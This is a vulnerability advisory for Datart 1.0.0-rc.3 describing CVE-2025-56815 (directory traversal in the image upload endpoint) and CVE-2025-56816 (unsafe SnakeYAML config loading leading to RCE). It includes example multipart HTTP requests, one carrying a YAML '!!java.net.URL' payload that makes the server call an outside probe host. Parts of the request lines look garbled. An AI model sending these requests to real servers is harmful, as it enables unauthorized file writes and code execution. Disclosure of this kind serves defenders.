Datart Directory Traversal and SnakeYAML Deserialization RCE (CVE-2025-56815/56816)

### Critical Vulnerability Information #### CVE-2025-56815 - **Vulnerability Type**: Directory Traversal - **Affected Versions**: Datart 1.0.0-rc.3 - **Vulnerability Description**: In the POST /viz/image interface, the server directly uses MultipartFile.transferTo() to save uploaded files to a path controlled by the user, without strict filename validation. - **Example Request**: ```http POST /api/v1/files/viz/image?ownerType=DASHBOARD&ownerId=66822c13a9bc4381923456c11339497e&file! Host: test.com Accept-Language: zh-CN Accept: application/json, text/plain, */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySInMdoLRiubl32BW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) CI Accept-Encoding: gzip, deflate Content-Length: 4646 ------WebKitFormBoundarySInMdoLRiubl32BW Content-Disposition: form-data; name="file"; filename="1.jpg" Content-Type: image/jpeg xxxx ------WebKitFormBoundarySInMdoLRiubl32BW-- ``` #### CVE-2025-56816 - **Vulnerability Type**: Directory Traversal - **Affected Versions**: Datart 1.0.0-rc.3 - **Vulnerability Description**: The application's configuration file handling allows attackers to upload arbitrary YAML files to the path config/jdbc-driver-ext.yml. The application uses SnakeYAML's unsafe load() or loadAs() methods to parse this file without input validation. This enables attackers to control the YAML content, leading to deserialization of arbitrary classes. Under certain conditions, this can be exploited to achieve Remote Code Execution (RCE). - **Example Request**: ```http POST /api/v1/files/viz/image?ownerType=DASHB0ARD&ownerId=teste!file! Host: test.com Accept-Language: zh-CN Accept: application/json, text/plain, */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySInMdoLRiubl32BW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) CI Accept-Encoding: gzip, deflate Content-Length: 4046 ------WebKitFormBoundarySInMdoLRiubl32BW Content-Disposition: form-data; name="file"; filename="1.jpg" Content-Type: image/jpeg { !!java.net.URL ["http://test.eyes.sh/"]: 1} ------WebKitFormBoundarySInMdoLRiubl32BW-- ```

Goal Reached Thanks to every supporter — we hit 100%!

Datart Directory Traversal and SnakeYAML Deserialization RCE (CVE-2025-56815/56816)

More from this source